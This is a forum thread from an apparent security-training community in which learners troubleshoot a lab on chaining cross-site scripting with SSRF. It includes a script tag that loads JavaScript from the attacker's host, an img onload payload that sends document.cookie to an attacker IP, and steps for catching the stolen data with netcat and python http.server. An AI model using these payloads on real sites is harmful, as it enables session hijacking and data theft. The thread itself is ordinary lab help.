Forum Discussion

shubham's avatar
shubham
Icon for Bronze I rankBronze I
8 months ago
Solved

Cross-Site Scripting: Ep.6 – Further Exploitation

I was stuck in one question looking for HINT.

Extend the XSS vulnerability to view the contents of the /admin/token page with SSRF.

17 Replies

  • ChrisKershaw's avatar
    ChrisKershaw
    Icon for Community Support rankCommunity Support

    Hey shubham

    Thank you for posting, and welcome to the Human Connection! I'm Chris, I work in the Customer Support Team, and I'll be happy to help you with your attempt 😊. 

    I'll be happy to share a hint to help you with your lab attempt:

    In the Ask a Question page, add the following to the Message field: <script src="http://$KALI_IP/script.js" ></script>

    Will you see if this helps you with your attempt? 


  • KieranRowley's avatar
    KieranRowley
    Icon for Community Manager rankCommunity Manager

    Hi shubham welcome to The Human Connection!

    Please can you provide some detail of the steps you have already taken so that your fellow community members are able to assist you?

    • shubham's avatar
      shubham
      Icon for Bronze I rankBronze I

      Thanks for welcome.

      So I tire using netcat with the payload in message to make a reverse connection

      Payload:<img src=xss onload="this.src='http://10.102.181.168:5556/admin/token?'+document.cookie;this.removeAttribute('onerror');"/>

      • NyePrior's avatar
        NyePrior
        Icon for Immerser rankImmerser

        Hi shubham 👋 have another look at the "XSS and SSRF" section of the Briefing panel. You'll need to use a different payload than this.

  • KieranRowley's avatar
    KieranRowley
    Icon for Community Manager rankCommunity Manager

    Hi shubham did the information above help?

    If so, please don't forget to mark it as a Solution ✅

    Marking a reply as a solution helps other community members to find answers to questions that they may also have. It also confirms to your fellow community members that their reply was helpful! You can accept more than one reply as a solution.

  • I am also having problems on this lesson. So far I haven't been able to get the site to execute any new code

    I tried running the hint from below as well as the following:

    <script src="http://0.0.0.0:8080/script.js"></script>

    My console just converts it to a string and does not actually call into the <script>. (notice how the question field is a string).

    I am sure I must be misunderstanding something, any help would be appreciated. 



  • Having the same issues.  Script is running, but /admin/token immediately redirects back to /dashboard.  Executed JS code in console and it returns html from /dashboard.  

    Created script.js on VM.  Running netcat instance on port 8080 to handle HTTP request.   I can see the request occur in terminal.   Token not returned.  

    Command being used in message field:  <script src="http://0.0.0.0:8080/script.js"></script>

  • Hi me5382 natelott 👋

    In both of your payloads, you're using 0.0.0.0 as the IP address. This would work if the Wildcard Cycles application was running locally on the Kali Desktop. However, as this is running on a different host, you'll need to specify the Kali IP address, not 0.0.0.0.

    • natelott's avatar
      natelott
      Icon for Bronze I rankBronze I

      NyePriorThanks for the reply.  I also tried this method. I used ip address from ifconfig, local host (127.0.0.1), and 0.0.0.0 got the same result.  If that were the case, how am I able to open the js file in the browser using http://0.0.0.0:8080/script.js url?  The JS is executing when I expose the vulnerability and I can see the request happen in netcat...  Therefore I feel confident that the issue is inside the js file or with the /admin/token itself.  I have tried the python method and the netcat method.   The /admin/token endpoint gets me a 302 permanent redirect.  As a python full stack developer w/ a good understanding of accessing local host as a local web server... I think I'm missing something else or not understanding the flow completely.

  • They key is knowing that you have to use python to host the remote .js file in parallel with netcat to listen for the response of the XSS malicious scripts.  Additionally, there are two steps to expose the data. One exposes the username and token cookie (question 1&2) in the query parameters.  The other displays the token in the html body.  The example code snippets work with VERY minor modifications.  One thing I did based on feedback from a peer, was to wrap Netcat in a look to keep it active in terminal for subsequent requests.

    • CyberSharpe's avatar
      CyberSharpe
      Icon for Bronze III rankBronze III

      Agreed.

      Run XSS exploit ensure your script allows this to loop with NC listening. Name and cookie given instantly. Then i hosted the payload using http.server and conducted SSRF this time using a different port number and NC. This dropped the full body then a cyber chef URLDecode the answer is available. 
      The actual script doesn’t need much work. 

  • I have done the following so far:

    1. Identify the wildcard cycles employee user ID & token
    2. Host the http server using the python module (port 8080)
    3. Create a script.js file w/ the code provided in the Briefing section w/ the XMLHttpRequest object's open method's url parameter set to /admin/token instead of /users/data (tried setting this many different things including http://{ip of employee machine}/admin/token, /{employee id}/{token} - 
    4. All the while having the nc -vnlp 5555 looping in an infinite while loop

    On the terminal monitoring the http server activity, I see a GET /script.js every ~60s or so, and each time that happens, the nc listening on 5555 shows the same keepalive traffic w/ the same user ID & token information, but not the contents of the actual /admin/token page... 

    I have a feeling I am missing something in item 3 listed above - something not right w/ how i have the script.js payload set up... 

    Been stuck on this for way longer than I care to, any guidance would be greatly appreciated. 

    • CyberSharpe's avatar
      CyberSharpe
      Icon for Bronze III rankBronze III

      johndoe321I changed the script to a different port to the one being bombarded and did another NC listener on that different port. Roled right in. 

      • johndoe321's avatar
        johndoe321
        Icon for Bronze I rankBronze I

        Wow that did it instantly, thank you CyberSharpe!! Guess 5555 is already in-use/bound to the first exploit... 

  • TillyCorless's avatar
    TillyCorless
    Icon for Community Manager rankCommunity Manager

    Hey johndoe321 I'm pleased that CyberSharpe was able to help you here! If you found their reply useful, please don't forget to mark it as a Solution ✅

    Marking a reply as a solution helps other community members to find answers to questions that they may also have. It also confirms to your fellow community members that their reply was helpful! You can accept more than one reply as a solution.

  • These replies have been moved.
"}},"componentScriptGroups({\"componentId\":\"custom.widget.Custom_Scripts\"})":{"__typename":"ComponentScriptGroups","scriptGroups":{"__typename":"ComponentScriptGroupsDefinition","afterInteractive":{"__typename":"PageScriptGroupDefinition","group":"AFTER_INTERACTIVE","scriptIds":[]},"lazyOnLoad":{"__typename":"PageScriptGroupDefinition","group":"LAZY_ON_LOAD","scriptIds":[]}},"componentScripts":[]},"messages({\"constraints\":{\"solution\":{\"eq\":true},\"topicId\":{\"eq\":\"message:506\"}},\"first\":10,\"sorts\":{\"postTime\":{\"direction\":\"ASC\"}}})":{"__typename":"MessageConnection","edges":[{"__typename":"MessageEdge","cursor":"MjUuM3wyLjF8aXwxMHwzOToxfGludCw1ODMsNTgz","node":{"__ref":"AcceptedSolutionMessage:message:583"}}],"pageInfo":{"__typename":"PageInfo","hasNextPage":false,"endCursor":null},"totalCount":1},"cachedText({\"lastModified\":\"1746024986000\",\"locale\":\"en-US\",\"namespaces\":[\"components/community/NavbarDropdownToggle\"]})":[{"__ref":"CachedAsset:text:en_US-components/community/NavbarDropdownToggle-1746024986000"}],"cachedText({\"lastModified\":\"1746024986000\",\"locale\":\"en-US\",\"namespaces\":[\"shared/client/components/users/UserAvatar\"]})":[{"__ref":"CachedAsset:text:en_US-shared/client/components/users/UserAvatar-1746024986000"}],"cachedText({\"lastModified\":\"1746024986000\",\"locale\":\"en-US\",\"namespaces\":[\"shared/client/components/ranks/UserRankLabel\"]})":[{"__ref":"CachedAsset:text:en_US-shared/client/components/ranks/UserRankLabel-1746024986000"}],"cachedText({\"lastModified\":\"1746024986000\",\"locale\":\"en-US\",\"namespaces\":[\"components/tags/TagView/TagViewChip\"]})":[{"__ref":"CachedAsset:text:en_US-components/tags/TagView/TagViewChip-1746024986000"}],"cachedText({\"lastModified\":\"1746024986000\",\"locale\":\"en-US\",\"namespaces\":[\"components/messages/AcceptedSolutionButton\"]})":[{"__ref":"CachedAsset:text:en_US-components/messages/AcceptedSolutionButton-1746024986000"}],"cachedText({\"lastModified\":\"1746024986000\",\"locale\":\"en-US\",\"namespaces\":[\"components/messages/MessageListMenu\"]})":[{"__ref":"CachedAsset:text:en_US-components/messages/MessageListMenu-1746024986000"}],"cachedText({\"lastModified\":\"1746024986000\",\"locale\":\"en-US\",\"namespaces\":[\"shared/client/components/common/Pager/PagerLoadMore\"]})":[{"__ref":"CachedAsset:text:en_US-shared/client/components/common/Pager/PagerLoadMore-1746024986000"}],"cachedText({\"lastModified\":\"1746024986000\",\"locale\":\"en-US\",\"namespaces\":[\"components/nodes/NodeView/NodeViewCard\"]})":[{"__ref":"CachedAsset:text:en_US-components/nodes/NodeView/NodeViewCard-1746024986000"}],"cachedText({\"lastModified\":\"1746024986000\",\"locale\":\"en-US\",\"namespaces\":[\"components/messages/MessageView/MessageViewInline\"]})":[{"__ref":"CachedAsset:text:en_US-components/messages/MessageView/MessageViewInline-1746024986000"}],"message({\"id\":\"message:589\"})":{"__ref":"ForumReplyMessage:message:589"},"message({\"id\":\"message:523\"})":{"__ref":"ForumReplyMessage:message:523"},"message({\"id\":\"message:539\"})":{"__ref":"ForumReplyMessage:message:539"},"message({\"id\":\"message:540\"})":{"__ref":"ForumReplyMessage:message:540"},"message({\"id\":\"message:542\"})":{"__ref":"ForumReplyMessage:message:542"},"message({\"id\":\"message:544\"})":{"__ref":"ForumReplyMessage:message:544"},"message({\"id\":\"message:546\"})":{"__ref":"ForumReplyMessage:message:546"},"message({\"id\":\"message:547\"})":{"__ref":"ForumReplyMessage:message:547"},"message({\"id\":\"message:555\"})":{"__ref":"ForumReplyMessage:message:555"},"message({\"id\":\"message:579\"})":{"__ref":"ForumReplyMessage:message:579"},"message({\"id\":\"message:585\"})":{"__ref":"ForumReplyMessage:message:585"},"message({\"id\":\"message:583\"})":{"__ref":"AcceptedSolutionMessage:message:583"},"message({\"id\":\"message:511\"})":{"__ref":"ForumReplyMessage:message:511"},"message({\"id\":\"message:507\"})":{"__ref":"ForumReplyMessage:message:507"},"message({\"id\":\"message:508\"})":{"__ref":"ForumReplyMessage:message:508"},"message({\"id\":\"message:545\"})":{"__ref":"ForumReplyMessage:message:545"},"cachedText({\"lastModified\":\"1746024986000\",\"locale\":\"en-US\",\"namespaces\":[\"shared/client/components/nodes/NodeTitle\"]})":[{"__ref":"CachedAsset:text:en_US-shared/client/components/nodes/NodeTitle-1746024986000"}]},"Theme:customTheme1":{"__typename":"Theme","id":"customTheme1"},"User:user:-1":{"__typename":"User","id":"user:-1","uid":-1,"login":"Anonymous","email":"","avatar":null,"rank":null,"kudosWeight":1,"registrationData":{"__typename":"RegistrationData","status":"ANONYMOUS","registrationTime":null,"confirmEmailStatus":false,"registrationAccessLevel":"VIEW","ssoRegistrationFields":[]},"ssoId":null,"profileSettings":{"__typename":"ProfileSettings","dateDisplayStyle":{"__typename":"InheritableStringSettingWithPossibleValues","key":"layout.friendly_dates_enabled","value":"true","localValue":"true","possibleValues":["true","false"]},"dateDisplayFormat":{"__typename":"InheritableStringSetting","key":"layout.format_pattern_date","value":"MM-dd-yyyy","localValue":"MM-dd-yyyy"},"language":{"__typename":"InheritableStringSettingWithPossibleValues","key":"profile.language","value":"en-US","localValue":null,"possibleValues":["en-US","es-ES"]},"repliesSortOrder":{"__typename":"InheritableStringSettingWithPossibleValues","key":"config.user_replies_sort_order","value":"DEFAULT","localValue":"DEFAULT","possibleValues":["DEFAULT","LIKES","PUBLISH_TIME","REVERSE_PUBLISH_TIME"]}},"deleted":false},"CachedAsset:pages-1746142329041":{"__typename":"CachedAsset","id":"pages-1746142329041","value":[{"lastUpdatedTime":1746142329041,"localOverride":null,"page":{"id":"BlogViewAllPostsPage","type":"BLOG","urlPath":"/category/:categoryId/blog/:boardId/all-posts/(/:after|/:before)?","__typename":"PageDescriptor"},"__typename":"PageResource"},{"lastUpdatedTime":1746142329041,"localOverride":null,"page":{"id":"CasePortalPage","type":"CASE_PORTAL","urlPath":"/caseportal","__typename":"PageDescriptor"},"__typename":"PageResource"},{"lastUpdatedTime":1746142329041,"localOverride":null,"page":{"id":"CreateGroupHubPage","type":"GROUP_HUB","urlPath":"/groups/create","__typename":"PageDescriptor"},"__typename":"PageResource"},{"lastUpdatedTime":1746142329041,"localOverride":null,"page":{"id":"CaseViewPage","type":"CASE_DETAILS","urlPath":"/case/:caseId/:caseNumber","__typename":"PageDescriptor"},"__typename":"PageResource"},{"lastUpdatedTime":1746142329041,"localOverride":null,"page":{"id":"InboxPage","type":"COMMUNITY","urlPath":"/inbox","__typename":"PageDescriptor"},"__typename":"PageResource"},{"lastUpdatedTime":1746142329041,"localOverride":null,"page":{"id":"HelpFAQPage","type":"COMMUNITY","urlPath":"/help","__typename":"PageDescriptor"},"__typename":"PageResource"},{"lastUpdatedTime":1746142329041,"localOverride":null,"page":{"id":"IdeaMessagePage","type":"IDEA_POST","urlPath":"/idea/:boardId/:messageSubject/:messageId","__typename":"PageDescriptor"},"__typename":"PageResource"},{"lastUpdatedTime":1746142329041,"localOverride":null,"page":{"id":"IdeaViewAllIdeasPage","type":"IDEA","urlPath":"/category/:categoryId/ideas/:boardId/all-ideas/(/:after|/:before)?","__typename":"PageDescriptor"},"__typename":"PageResource"},{"lastUpdatedTime":1746142329041,"localOverride":null,"page":{"id":"LoginPage","type":"USER","urlPath":"/signin","__typename":"PageDescriptor"},"__typename":"PageResource"},{"lastUpdatedTime":1746142329041,"localOverride":null,"page":{"id":"BlogPostPage","type":"BLOG","urlPath":"/category/:categoryId/blogs/:boardId/create","__typename":"PageDescriptor"},"__typename":"PageResource"},{"lastUpdatedTime":1746142329041,"localOverride":null,"page":{"id":"ThemeEditorPage","type":"COMMUNITY","urlPath":"/designer/themes","__typename":"PageDescriptor"},"__typename":"PageResource"},{"lastUpdatedTime":1746142329041,"localOverride":null,"page":{"id":"TkbViewAllArticlesPage","type":"TKB","urlPath":"/category/:categoryId/kb/:boardId/all-articles/(/:after|/:before)?","__typename":"PageDescriptor"},"__typename":"PageResource"},{"lastUpdatedTime":1746142329041,"localOverride":null,"page":{"id":"OccasionEditPage","type":"EVENT","urlPath":"/event/:boardId/:messageSubject/:messageId/edit","__typename":"PageDescriptor"},"__typename":"PageResource"},{"lastUpdatedTime":1746142329041,"localOverride":null,"page":{"id":"OAuthAuthorizationAllowPage","type":"USER","urlPath":"/auth/authorize/allow","__typename":"PageDescriptor"},"__typename":"PageResource"},{"lastUpdatedTime":1746142329041,"localOverride":null,"page":{"id":"PageEditorPage","type":"COMMUNITY","urlPath":"/designer/pages","__typename":"PageDescriptor"},"__typename":"PageResource"},{"lastUpdatedTime":1746142329041,"localOverride":null,"page":{"id":"PostPage","type":"COMMUNITY","urlPath":"/category/:categoryId/:boardId/create","__typename":"PageDescriptor"},"__typename":"PageResource"},{"lastUpdatedTime":1746142329041,"localOverride":null,"page":{"id":"ForumBoardPage","type":"FORUM","urlPath":"/category/:categoryId/discussions/:boardId","__typename":"PageDescriptor"},"__typename":"PageResource"},{"lastUpdatedTime":1746142329041,"localOverride":null,"page":{"id":"TkbBoardPage","type":"TKB","urlPath":"/category/:categoryId/kb/:boardId","__typename":"PageDescriptor"},"__typename":"PageResource"},{"lastUpdatedTime":1746142329041,"localOverride":null,"page":{"id":"EventPostPage","type":"EVENT","urlPath":"/category/:categoryId/events/:boardId/create","__typename":"PageDescriptor"},"__typename":"PageResource"},{"lastUpdatedTime":1746142329041,"localOverride":null,"page":{"id":"UserBadgesPage","type":"COMMUNITY","urlPath":"/users/:login/:userId/badges","__typename":"PageDescriptor"},"__typename":"PageResource"},{"lastUpdatedTime":1746142329041,"localOverride":null,"page":{"id":"GroupHubMembershipAction","type":"GROUP_HUB","urlPath":"/membership/join/:nodeId/:membershipType","__typename":"PageDescriptor"},"__typename":"PageResource"},{"lastUpdatedTime":1746142329041,"localOverride":null,"page":{"id":"MaintenancePage","type":"COMMUNITY","urlPath":"/maintenance","__typename":"PageDescriptor"},"__typename":"PageResource"},{"lastUpdatedTime":1746142329041,"localOverride":null,"page":{"id":"IdeaReplyPage","type":"IDEA_REPLY","urlPath":"/idea/:boardId/:messageSubject/:messageId/comments/:replyId","__typename":"PageDescriptor"},"__typename":"PageResource"},{"lastUpdatedTime":1746142329041,"localOverride":null,"page":{"id":"UserSettingsPage","type":"USER","urlPath":"/mysettings/:userSettingsTab","__typename":"PageDescriptor"},"__typename":"PageResource"},{"lastUpdatedTime":1746142329041,"localOverride":null,"page":{"id":"GroupHubsPage","type":"GROUP_HUB","urlPath":"/groups","__typename":"PageDescriptor"},"__typename":"PageResource"},{"lastUpdatedTime":1746142329041,"localOverride":null,"page":{"id":"ForumPostPage","type":"FORUM","urlPath":"/category/:categoryId/discussions/:boardId/create","__typename":"PageDescriptor"},"__typename":"PageResource"},{"lastUpdatedTime":1746142329041,"localOverride":null,"page":{"id":"OccasionRsvpActionPage","type":"OCCASION","urlPath":"/event/:boardId/:messageSubject/:messageId/rsvp/:responseType","__typename":"PageDescriptor"},"__typename":"PageResource"},{"lastUpdatedTime":1746142329041,"localOverride":null,"page":{"id":"VerifyUserEmailPage","type":"USER","urlPath":"/verifyemail/:userId/:verifyEmailToken","__typename":"PageDescriptor"},"__typename":"PageResource"},{"lastUpdatedTime":1746142329041,"localOverride":null,"page":{"id":"AllOccasionsPage","type":"OCCASION","urlPath":"/category/:categoryId/events/:boardId/all-events/(/:after|/:before)?","__typename":"PageDescriptor"},"__typename":"PageResource"},{"lastUpdatedTime":1746142329041,"localOverride":null,"page":{"id":"EventBoardPage","type":"EVENT","urlPath":"/category/:categoryId/events/:boardId","__typename":"PageDescriptor"},"__typename":"PageResource"},{"lastUpdatedTime":1746142329041,"localOverride":null,"page":{"id":"TkbReplyPage","type":"TKB_REPLY","urlPath":"/kb/:boardId/:messageSubject/:messageId/comments/:replyId","__typename":"PageDescriptor"},"__typename":"PageResource"},{"lastUpdatedTime":1746142329041,"localOverride":null,"page":{"id":"IdeaBoardPage","type":"IDEA","urlPath":"/category/:categoryId/ideas/:boardId","__typename":"PageDescriptor"},"__typename":"PageResource"},{"lastUpdatedTime":1746142329041,"localOverride":null,"page":{"id":"CommunityGuideLinesPage","type":"COMMUNITY","urlPath":"/communityguidelines","__typename":"PageDescriptor"},"__typename":"PageResource"},{"lastUpdatedTime":1746142329041,"localOverride":null,"page":{"id":"CaseCreatePage","type":"SALESFORCE_CASE_CREATION","urlPath":"/caseportal/create","__typename":"PageDescriptor"},"__typename":"PageResource"},{"lastUpdatedTime":1746142329041,"localOverride":null,"page":{"id":"TkbEditPage","type":"TKB","urlPath":"/kb/:boardId/:messageSubject/:messageId/edit","__typename":"PageDescriptor"},"__typename":"PageResource"},{"lastUpdatedTime":1746142329041,"localOverride":null,"page":{"id":"ForgotPasswordPage","type":"USER","urlPath":"/forgotpassword","__typename":"PageDescriptor"},"__typename":"PageResource"},{"lastUpdatedTime":1746142329041,"localOverride":null,"page":{"id":"IdeaEditPage","type":"IDEA","urlPath":"/idea/:boardId/:messageSubject/:messageId/edit","__typename":"PageDescriptor"},"__typename":"PageResource"},{"lastUpdatedTime":1746142329041,"localOverride":null,"page":{"id":"TagPage","type":"COMMUNITY","urlPath":"/tag/:tagName","__typename":"PageDescriptor"},"__typename":"PageResource"},{"lastUpdatedTime":1746142329041,"localOverride":null,"page":{"id":"BlogBoardPage","type":"BLOG","urlPath":"/category/:categoryId/blog/:boardId","__typename":"PageDescriptor"},"__typename":"PageResource"},{"lastUpdatedTime":1746142329041,"localOverride":null,"page":{"id":"OccasionMessagePage","type":"OCCASION_TOPIC","urlPath":"/event/:boardId/:messageSubject/:messageId","__typename":"PageDescriptor"},"__typename":"PageResource"},{"lastUpdatedTime":1746142329041,"localOverride":null,"page":{"id":"ManageContentPage","type":"COMMUNITY","urlPath":"/managecontent","__typename":"PageDescriptor"},"__typename":"PageResource"},{"lastUpdatedTime":1746142329041,"localOverride":null,"page":{"id":"ClosedMembershipNodeNonMembersPage","type":"GROUP_HUB","urlPath":"/closedgroup/:groupHubId","__typename":"PageDescriptor"},"__typename":"PageResource"},{"lastUpdatedTime":1746142329041,"localOverride":null,"page":{"id":"CommunityPage","type":"COMMUNITY","urlPath":"/","__typename":"PageDescriptor"},"__typename":"PageResource"},{"lastUpdatedTime":1746142329041,"localOverride":null,"page":{"id":"ForumMessagePage","type":"FORUM_TOPIC","urlPath":"/discussions/:boardId/:messageSubject/:messageId","__typename":"PageDescriptor"},"__typename":"PageResource"},{"lastUpdatedTime":1746142329041,"localOverride":null,"page":{"id":"IdeaPostPage","type":"IDEA","urlPath":"/category/:categoryId/ideas/:boardId/create","__typename":"PageDescriptor"},"__typename":"PageResource"},{"lastUpdatedTime":1746142329041,"localOverride":null,"page":{"id":"BlogMessagePage","type":"BLOG_ARTICLE","urlPath":"/blog/:boardId/:messageSubject/:messageId","__typename":"PageDescriptor"},"__typename":"PageResource"},{"lastUpdatedTime":1746142329041,"localOverride":null,"page":{"id":"RegistrationPage","type":"USER","urlPath":"/register","__typename":"PageDescriptor"},"__typename":"PageResource"},{"lastUpdatedTime":1746142329041,"localOverride":null,"page":{"id":"EditGroupHubPage","type":"GROUP_HUB","urlPath":"/group/:groupHubId/edit","__typename":"PageDescriptor"},"__typename":"PageResource"},{"lastUpdatedTime":1746142329041,"localOverride":null,"page":{"id":"ForumEditPage","type":"FORUM","urlPath":"/discussions/:boardId/:messageSubject/:messageId/edit","__typename":"PageDescriptor"},"__typename":"PageResource"},{"lastUpdatedTime":1746142329041,"localOverride":null,"page":{"id":"ResetPasswordPage","type":"USER","urlPath":"/resetpassword/:userId/:resetPasswordToken","__typename":"PageDescriptor"},"__typename":"PageResource"},{"lastUpdatedTime":1746142329041,"localOverride":null,"page":{"id":"TkbMessagePage","type":"TKB_ARTICLE","urlPath":"/kb/:boardId/:messageSubject/:messageId","__typename":"PageDescriptor"},"__typename":"PageResource"},{"lastUpdatedTime":1746142329041,"localOverride":null,"page":{"id":"BlogEditPage","type":"BLOG","urlPath":"/blog/:boardId/:messageSubject/:messageId/edit","__typename":"PageDescriptor"},"__typename":"PageResource"},{"lastUpdatedTime":1746142329041,"localOverride":null,"page":{"id":"ManageUsersPage","type":"USER","urlPath":"/users/manage/:tab?/:manageUsersTab?","__typename":"PageDescriptor"},"__typename":"PageResource"},{"lastUpdatedTime":1746142329041,"localOverride":null,"page":{"id":"ForumReplyPage","type":"FORUM_REPLY","urlPath":"/discussions/:boardId/:messageSubject/:messageId/replies/:replyId","__typename":"PageDescriptor"},"__typename":"PageResource"},{"lastUpdatedTime":1746142329041,"localOverride":null,"page":{"id":"PrivacyPolicyPage","type":"COMMUNITY","urlPath":"/privacypolicy","__typename":"PageDescriptor"},"__typename":"PageResource"},{"lastUpdatedTime":1746142329041,"localOverride":null,"page":{"id":"NotificationPage","type":"COMMUNITY","urlPath":"/notifications","__typename":"PageDescriptor"},"__typename":"PageResource"},{"lastUpdatedTime":1746142329041,"localOverride":null,"page":{"id":"UserPage","type":"USER","urlPath":"/users/:login/:userId","__typename":"PageDescriptor"},"__typename":"PageResource"},{"lastUpdatedTime":1746142329041,"localOverride":null,"page":{"id":"HealthCheckPage","type":"COMMUNITY","urlPath":"/health","__typename":"PageDescriptor"},"__typename":"PageResource"},{"lastUpdatedTime":1746142329041,"localOverride":null,"page":{"id":"OccasionReplyPage","type":"OCCASION_REPLY","urlPath":"/event/:boardId/:messageSubject/:messageId/comments/:replyId","__typename":"PageDescriptor"},"__typename":"PageResource"},{"lastUpdatedTime":1746142329041,"localOverride":null,"page":{"id":"ManageMembersPage","type":"GROUP_HUB","urlPath":"/group/:groupHubId/manage/:tab?","__typename":"PageDescriptor"},"__typename":"PageResource"},{"lastUpdatedTime":1746142329041,"localOverride":null,"page":{"id":"SearchResultsPage","type":"COMMUNITY","urlPath":"/search","__typename":"PageDescriptor"},"__typename":"PageResource"},{"lastUpdatedTime":1746142329041,"localOverride":null,"page":{"id":"BlogReplyPage","type":"BLOG_REPLY","urlPath":"/blog/:boardId/:messageSubject/:messageId/replies/:replyId","__typename":"PageDescriptor"},"__typename":"PageResource"},{"lastUpdatedTime":1746142329041,"localOverride":null,"page":{"id":"GroupHubPage","type":"GROUP_HUB","urlPath":"/group/:groupHubId","__typename":"PageDescriptor"},"__typename":"PageResource"},{"lastUpdatedTime":1746142329041,"localOverride":null,"page":{"id":"TermsOfServicePage","type":"COMMUNITY","urlPath":"/termsofservice","__typename":"PageDescriptor"},"__typename":"PageResource"},{"lastUpdatedTime":1746142329041,"localOverride":null,"page":{"id":"CategoryPage","type":"CATEGORY","urlPath":"/category/:categoryId","__typename":"PageDescriptor"},"__typename":"PageResource"},{"lastUpdatedTime":1746142329041,"localOverride":null,"page":{"id":"ForumViewAllTopicsPage","type":"FORUM","urlPath":"/category/:categoryId/discussions/:boardId/all-topics/(/:after|/:before)?","__typename":"PageDescriptor"},"__typename":"PageResource"},{"lastUpdatedTime":1746142329041,"localOverride":null,"page":{"id":"TkbPostPage","type":"TKB","urlPath":"/category/:categoryId/kbs/:boardId/create","__typename":"PageDescriptor"},"__typename":"PageResource"},{"lastUpdatedTime":1746142329041,"localOverride":null,"page":{"id":"GroupHubPostPage","type":"GROUP_HUB","urlPath":"/group/:groupHubId/:boardId/create","__typename":"PageDescriptor"},"__typename":"PageResource"}],"localOverride":false},"CachedAsset:text:en_US-components/context/AppContext/AppContextProvider-0":{"__typename":"CachedAsset","id":"text:en_US-components/context/AppContext/AppContextProvider-0","value":{"noCommunity":"Cannot find community","noUser":"Cannot find current user","noNode":"Cannot find node with id {nodeId}","noMessage":"Cannot find message with id {messageId}","userBanned":"We're sorry, but you have been banned from using this site.","userBannedReason":"You have been banned for the following reason: {reason}"},"localOverride":false},"CachedAsset:text:en_US-shared/client/components/common/Loading/LoadingDot-0":{"__typename":"CachedAsset","id":"text:en_US-shared/client/components/common/Loading/LoadingDot-0","value":{"title":"Loading..."},"localOverride":false},"AssociatedImage:{\"url\":\"https://community.immersivelabs.com/t5/s/dnvaw96485/images/cmstOC1DNldCZUw\"}":{"__typename":"AssociatedImage","url":"https://community.immersivelabs.com/t5/s/dnvaw96485/images/cmstOC1DNldCZUw","height":160,"width":141,"mimeType":"image/png"},"Rank:rank:8":{"__typename":"Rank","id":"rank:8","position":20,"name":"Bronze I","color":"C69A70","icon":{"__ref":"AssociatedImage:{\"url\":\"https://community.immersivelabs.com/t5/s/dnvaw96485/images/cmstOC1DNldCZUw\"}"},"rankStyle":"FILLED"},"User:user:182":{"__typename":"User","id":"user:182","uid":182,"login":"shubham","deleted":false,"avatar":{"__typename":"UserAvatar","url":"https://community.immersivelabs.com/t5/s/dnvaw96485/m_assets/avatars/default/avatar-10.svg?time=0"},"rank":{"__ref":"Rank:rank:8"},"email":"","messagesCount":2,"biography":null,"topicsCount":1,"kudosReceivedCount":4,"kudosGivenCount":0,"kudosWeight":1,"registrationData":{"__typename":"RegistrationData","status":null,"registrationTime":"2024-09-20T01:27:19.377-07:00","confirmEmailStatus":null},"followersCount":null,"solutionsCount":0,"entityType":"USER","eventPath":"community:dnvaw96485/user:182"},"Category:category:help":{"__typename":"Category","id":"category:help","entityType":"CATEGORY","displayId":"help","nodeType":"category","depth":1,"title":"Help","shortTitle":"Help","parent":{"__ref":"Category:category:top"}},"Category:category:top":{"__typename":"Category","id":"category:top","entityType":"CATEGORY","displayId":"top","nodeType":"category","depth":0,"title":"Top","shortTitle":"Top"},"Forum:board:help":{"__typename":"Forum","id":"board:help","entityType":"FORUM","displayId":"help","nodeType":"board","depth":2,"conversationStyle":"FORUM","repliesProperties":{"__typename":"RepliesProperties","sortOrder":"LIKES","repliesFormat":"threaded"},"tagProperties":{"__typename":"TagNodeProperties","tagsEnabled":{"__typename":"PolicyResult","failureReason":null}},"requireTags":true,"tagType":"PRESET_ONLY","description":"Do you have a question about an Immersive product or feature? This is where the experts hang out, and they are always happy to help!","title":"Help & Support Forum","shortTitle":"Help & Support Forum","parent":{"__ref":"Category:category:help"},"ancestors":{"__typename":"CoreNodeConnection","edges":[{"__typename":"CoreNodeEdge","node":{"__ref":"Community:community:dnvaw96485"}},{"__typename":"CoreNodeEdge","node":{"__ref":"Category:category:help"}}]},"userContext":{"__typename":"NodeUserContext","canAddAttachments":false,"canUpdateNode":false,"canPostMessages":false,"isSubscribed":false},"theme":{"__ref":"Theme:customTheme1"},"boardPolicies":{"__typename":"BoardPolicies","canViewSpamDashBoard":{"__typename":"PolicyResult","failureReason":{"__typename":"FailureReason","message":"error.lithium.policies.feature.moderation_spam.action.access_spam_quarantine.allowed.accessDenied","key":"error.lithium.policies.feature.moderation_spam.action.access_spam_quarantine.allowed.accessDenied","args":[]}},"canArchiveMessage":{"__typename":"PolicyResult","failureReason":{"__typename":"FailureReason","message":"error.lithium.policies.content_archivals.enable_content_archival_settings.accessDenied","key":"error.lithium.policies.content_archivals.enable_content_archival_settings.accessDenied","args":[]}},"canPublishArticleOnCreate":{"__typename":"PolicyResult","failureReason":{"__typename":"FailureReason","message":"error.lithium.policies.forums.policy_can_publish_on_create_workflow_action.accessDenied","key":"error.lithium.policies.forums.policy_can_publish_on_create_workflow_action.accessDenied","args":[]}},"canManageFeaturedWidget":{"__typename":"PolicyResult","failureReason":{"__typename":"FailureReason","message":"error.lithium.policies.feature.featured_widgets.action.admin_featured_widget.allowed.accessDenied","key":"error.lithium.policies.feature.featured_widgets.action.admin_featured_widget.allowed.accessDenied","args":[]}},"canUpdateFeaturedWidget":{"__typename":"PolicyResult","failureReason":{"__typename":"FailureReason","message":"error.lithium.policies.feature.featured_widgets.action.update_featured_widget.allowed.accessDenied","key":"error.lithium.policies.feature.featured_widgets.action.update_featured_widget.allowed.accessDenied","args":[]}},"canReadNode":{"__typename":"PolicyResult","failureReason":null}},"forumPolicies":{"__typename":"ForumPolicies","canManageFeaturedWidget":{"__typename":"PolicyResult","failureReason":{"__typename":"FailureReason","message":"error.lithium.policies.feature.featured_widgets.action.admin_featured_widget.allowed.accessDenied","key":"error.lithium.policies.feature.featured_widgets.action.admin_featured_widget.allowed.accessDenied","args":[]}},"canUpdateFeaturedWidget":{"__typename":"PolicyResult","failureReason":{"__typename":"FailureReason","message":"error.lithium.policies.feature.featured_widgets.action.update_featured_widget.allowed.accessDenied","key":"error.lithium.policies.feature.featured_widgets.action.update_featured_widget.allowed.accessDenied","args":[]}},"canReadNode":{"__typename":"PolicyResult","failureReason":null}},"avatar":{"__ref":"AssociatedImage:{\"url\":\"https://community.immersivelabs.com/t5/s/dnvaw96485/images/bi00MS1jS0RtS1k\"}"},"eventPath":"category:help/community:dnvaw96485board:help/"},"ForumTopicMessage:message:506":{"__typename":"ForumTopicMessage","uid":506,"subject":"Cross-Site Scripting: Ep.6 – Further 